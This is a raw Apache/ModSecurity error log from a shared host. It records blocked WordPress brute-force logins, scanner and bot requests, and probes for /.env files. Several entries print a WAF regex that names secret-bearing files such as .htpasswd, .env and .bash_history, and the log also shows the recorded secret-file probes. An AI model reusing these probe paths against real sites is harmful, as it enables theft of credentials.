[Tue May 26 19:31:52.761402 2026] [security2:error] [pid 58470:tid 58645] [client 91.245.236.124:55043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 124.236.245.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWn0LnjVHRH3AGGvmYA1AAAAC0"]
[Tue May 26 19:31:52.761564 2026] [security2:error] [pid 58470:tid 58645] [client 91.245.236.124:55043] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWn0LnjVHRH3AGGvmYA1AAAAC0"]
[Tue May 26 19:31:53.316993 2026] [security2:error] [pid 58470:tid 58609] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn0LnjVHRH3AGGvmYA4gAAAAk"]
[Tue May 26 19:31:53.334108 2026] [security2:error] [pid 58470:tid 58701] [client 62.244.225.226:9898] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahWn0bnjVHRH3AGGvmYA6AAAAGU"]
[Tue May 26 19:31:53.523695 2026] [security2:error] [pid 58470:tid 58669] [client 91.245.236.124:16189] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 124.236.245.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWn0bnjVHRH3AGGvmYA9AAAAEU"]
[Tue May 26 19:31:53.523819 2026] [security2:error] [pid 58470:tid 58669] [client 91.245.236.124:16189] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWn0bnjVHRH3AGGvmYA9AAAAEU"]
[Tue May 26 19:31:53.611869 2026] [security2:error] [pid 58470:tid 58549] [remote 216.73.216.30:20852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWn0bnjVHRH3AGGvmYA_QAAGk4"]
[Tue May 26 19:31:54.296939 2026] [security2:error] [pid 58470:tid 58656] [client 91.245.236.124:28945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 124.236.245.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-login.php"] [unique_id "ahWn0rnjVHRH3AGGvmYBDgAAADg"], referer: https://www.google.com
[Tue May 26 19:31:55.060089 2026] [security2:error] [pid 58470:tid 58615] [client 91.245.236.124:42693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 124.236.245.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-login.php"] [unique_id "ahWn07njVHRH3AGGvmYBIQAAAA8"], referer: https://www.google.com
[Tue May 26 19:31:55.501653 2026] [security2:error] [pid 58470:tid 58609] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn07njVHRH3AGGvmYBIwAAAAk"]
[Tue May 26 19:31:57.210372 2026] [security2:error] [pid 58470:tid 58682] [client 94.23.188.213:21768] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "rehobothindependentcare.com"] [uri "/robots.txt"] [unique_id "ahWn1bnjVHRH3AGGvmYBWgAAAFI"]
[Tue May 26 19:31:57.210500 2026] [security2:error] [pid 58470:tid 58682] [client 94.23.188.213:21768] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "rehobothindependentcare.com"] [uri "/robots.txt"] [unique_id "ahWn1bnjVHRH3AGGvmYBWgAAAFI"]
[Tue May 26 19:31:57.481195 2026] [security2:error] [pid 58470:tid 58643] [client 91.245.236.124:26995] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "virgence.com"] [uri "/index.php"] [unique_id "ahWn07njVHRH3AGGvmYBOgAAACs"], referer: https://www.google.com
[Tue May 26 19:31:57.686862 2026] [security2:error] [pid 58470:tid 58648] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn1bnjVHRH3AGGvmYBXgAAADA"]
[Tue May 26 19:31:58.431522 2026] [security2:error] [pid 58470:tid 58536] [remote 216.73.216.30:20852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWn1rnjVHRH3AGGvmYBfwAAJUE"]
[Tue May 26 19:31:58.692581 2026] [fcgid:warn] [pid 58470:tid 58658] (70014)End of file found: [client 66.132.186.160:59748] mod_fcgid: can't get data from http client
[Tue May 26 19:31:58.895807 2026] [security2:error] [pid 58470:tid 58537] [remote 113.190.40.93:33852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWn1rnjVHRH3AGGvmYBgQAAbUI"]
[Tue May 26 19:31:59.518546 2026] [security2:error] [pid 58470:tid 58559] [remote 72.167.150.128:35596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWn17njVHRH3AGGvmYBmAAAOFg"]
[Tue May 26 19:31:59.659391 2026] [security2:error] [pid 58470:tid 58629] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn17njVHRH3AGGvmYBkQAAAB0"]
[Tue May 26 19:31:59.781980 2026] [security2:error] [pid 58470:tid 58546] [remote 72.167.150.128:35596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWn17njVHRH3AGGvmYBnwAACks"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:32:00.061263 2026] [security2:error] [pid 58470:tid 58561] [remote 82.196.25.136:51758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWn17njVHRH3AGGvmYBpAAABVo"]
[Tue May 26 19:32:00.599868 2026] [security2:error] [pid 58470:tid 58569] [remote 74.207.252.187:42226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.252.207.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWn2LnjVHRH3AGGvmYBrwAAKmI"]
[Tue May 26 19:32:00.831941 2026] [security2:error] [pid 58470:tid 58544] [remote 74.207.252.187:42226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 187.252.207.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWn2LnjVHRH3AGGvmYBsQAAH0k"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:32:02.218895 2026] [security2:error] [pid 58470:tid 58677] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn2bnjVHRH3AGGvmYB3QAAAE0"]
[Tue May 26 19:32:02.756859 2026] [security2:error] [pid 58470:tid 58602] [client 54.39.6.132:32646] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "rehobothindependentcare.com"] [uri "/"] [unique_id "ahWn2rnjVHRH3AGGvmYB8QAAAAI"]
[Tue May 26 19:32:02.757019 2026] [security2:error] [pid 58470:tid 58602] [client 54.39.6.132:32646] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "rehobothindependentcare.com"] [uri "/"] [unique_id "ahWn2rnjVHRH3AGGvmYB8QAAAAI"]
[Tue May 26 19:32:03.675245 2026] [security2:error] [pid 58470:tid 58577] [remote 216.73.216.30:52656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWn27njVHRH3AGGvmYCBAAADmo"]
[Tue May 26 19:32:03.923191 2026] [security2:error] [pid 58470:tid 58697] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn27njVHRH3AGGvmYCAAAAAGE"]
[Tue May 26 19:32:03.924120 2026] [core:crit] [pid 58470:tid 58700] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:32:04.070584 2026] [security2:error] [pid 58470:tid 58566] [remote 92.205.109.21:48546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWn27njVHRH3AGGvmYCCwAAbF8"]
[Tue May 26 19:32:04.304073 2026] [security2:error] [pid 58470:tid 58582] [remote 20.153.140.50:60794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWn3LnjVHRH3AGGvmYCFAAAeW8"]
[Tue May 26 19:32:05.341412 2026] [security2:error] [pid 58470:tid 58580] [remote 92.205.109.21:48546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWn3bnjVHRH3AGGvmYCNAAAD20"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 19:32:06.195498 2026] [security2:error] [pid 58470:tid 58618] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn3bnjVHRH3AGGvmYCQQAAABI"]
[Tue May 26 19:32:08.033571 2026] [security2:error] [pid 58470:tid 58719] [client 62.217.189.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn37njVHRH3AGGvmYCYgAAAHc"]
[Tue May 26 19:32:08.338164 2026] [security2:error] [pid 58470:tid 58668] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn37njVHRH3AGGvmYCbwAAAEQ"]
[Tue May 26 19:32:08.436697 2026] [security2:error] [pid 58470:tid 58590] [remote 216.73.216.30:52656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWn4LnjVHRH3AGGvmYChAAAdHc"]
[Tue May 26 19:32:09.248733 2026] [core:crit] [pid 58470:tid 58653] (13)Permission denied: [client 157.55.39.10:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:32:09.906050 2026] [security2:error] [pid 58470:tid 58655] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn4bnjVHRH3AGGvmYCogAAADc"]
[Tue May 26 19:32:10.391982 2026] [core:crit] [pid 58470:tid 58619] (13)Permission denied: [client 157.55.39.10:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:32:11.260252 2026] [core:crit] [pid 58470:tid 58629] (13)Permission denied: [client 157.55.39.10:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:32:12.058057 2026] [security2:error] [pid 58470:tid 58689] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "avprealty.com"] [uri "/index.php"] [unique_id "ahWn4rnjVHRH3AGGvmYCuAAAAFk"]
[Tue May 26 19:32:12.188544 2026] [security2:error] [pid 58470:tid 58655] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn47njVHRH3AGGvmYC5AAAADc"]
[Tue May 26 19:32:13.702311 2026] [security2:error] [pid 58470:tid 58488] [remote 216.73.216.30:61666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWn5bnjVHRH3AGGvmYDFgAAfhE"]
[Tue May 26 19:32:14.335732 2026] [security2:error] [pid 58470:tid 58683] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn5bnjVHRH3AGGvmYDHwAAAFM"]
[Tue May 26 19:32:14.752180 2026] [security2:error] [pid 58470:tid 58684] [client 114.119.159.26:59643] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/referanslar/mersin-web-tasarim-saloon-istanbul-bayan-kuaforu"] [unique_id "ahWn5rnjVHRH3AGGvmYDLgAAAFQ"], referer: https://www.cagmedya.com/referanslar
[Tue May 26 19:32:14.950416 2026] [security2:error] [pid 58470:tid 58498] [remote 51.91.98.45:54802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWn5rnjVHRH3AGGvmYDLwAAZRs"]
[Tue May 26 19:32:16.376485 2026] [security2:error] [pid 58470:tid 58648] [client 107.172.204.23:52280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/.env"] [unique_id "ahWn6LnjVHRH3AGGvmYDZwAAADA"]
[Tue May 26 19:32:16.633177 2026] [security2:error] [pid 58470:tid 58722] [client 107.172.204.23:52332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/backend/.env"] [unique_id "ahWn6LnjVHRH3AGGvmYDawAAAHo"]
[Tue May 26 19:32:16.999555 2026] [security2:error] [pid 58470:tid 58709] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn6LnjVHRH3AGGvmYDagAAAG0"]
[Tue May 26 19:32:17.230892 2026] [security2:error] [pid 58470:tid 58649] [client 107.172.204.23:52280] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/api/.env"] [unique_id "ahWn6bnjVHRH3AGGvmYDhAAAADE"]
[Tue May 26 19:32:19.166253 2026] [security2:error] [pid 58470:tid 58690] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn6rnjVHRH3AGGvmYDtAAAAFo"]
[Tue May 26 19:32:21.309283 2026] [security2:error] [pid 58470:tid 58602] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn7LnjVHRH3AGGvmYD8AAAAAI"]
[Tue May 26 19:32:22.453461 2026] [security2:error] [pid 58470:tid 58512] [remote 103.11.102.106:48456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWn7rnjVHRH3AGGvmYEDQAACSk"]
[Tue May 26 19:32:23.457828 2026] [security2:error] [pid 58470:tid 58526] [remote 216.73.216.30:61666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWn77njVHRH3AGGvmYEKQAAbzc"]
[Tue May 26 19:32:23.607004 2026] [security2:error] [pid 58470:tid 58647] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn77njVHRH3AGGvmYEHwAAAC8"]
[Tue May 26 19:32:25.754969 2026] [security2:error] [pid 58470:tid 58654] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn8bnjVHRH3AGGvmYEUgAAADY"]
[Tue May 26 19:32:27.416559 2026] [security2:error] [pid 58470:tid 58712] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn8rnjVHRH3AGGvmYEewAAAHA"]
[Tue May 26 19:32:28.745134 2026] [security2:error] [pid 58470:tid 58554] [remote 216.73.216.30:44720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWn9LnjVHRH3AGGvmYErgAAMlM"]
[Tue May 26 19:32:29.437545 2026] [security2:error] [pid 58470:tid 58541] [remote 94.76.235.103:35922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWn9bnjVHRH3AGGvmYEuQAAckY"]
[Tue May 26 19:32:30.044194 2026] [security2:error] [pid 58470:tid 58635] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn9bnjVHRH3AGGvmYExgAAACM"]
[Tue May 26 19:32:32.574800 2026] [security2:error] [pid 58470:tid 58602] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn-LnjVHRH3AGGvmYFCgAAAAI"]
[Tue May 26 19:32:32.716131 2026] [security2:error] [pid 58470:tid 58715] [client 14.230.181.238:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWn-LnjVHRH3AGGvmYFEAAAAHM"]
[Tue May 26 19:32:34.151507 2026] [security2:error] [pid 58470:tid 58620] [client 159.203.42.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "filosha.com"] [uri "/index.php"] [unique_id "ahWn-rnjVHRH3AGGvmYFSgAAABQ"], referer: http://filosha.com/
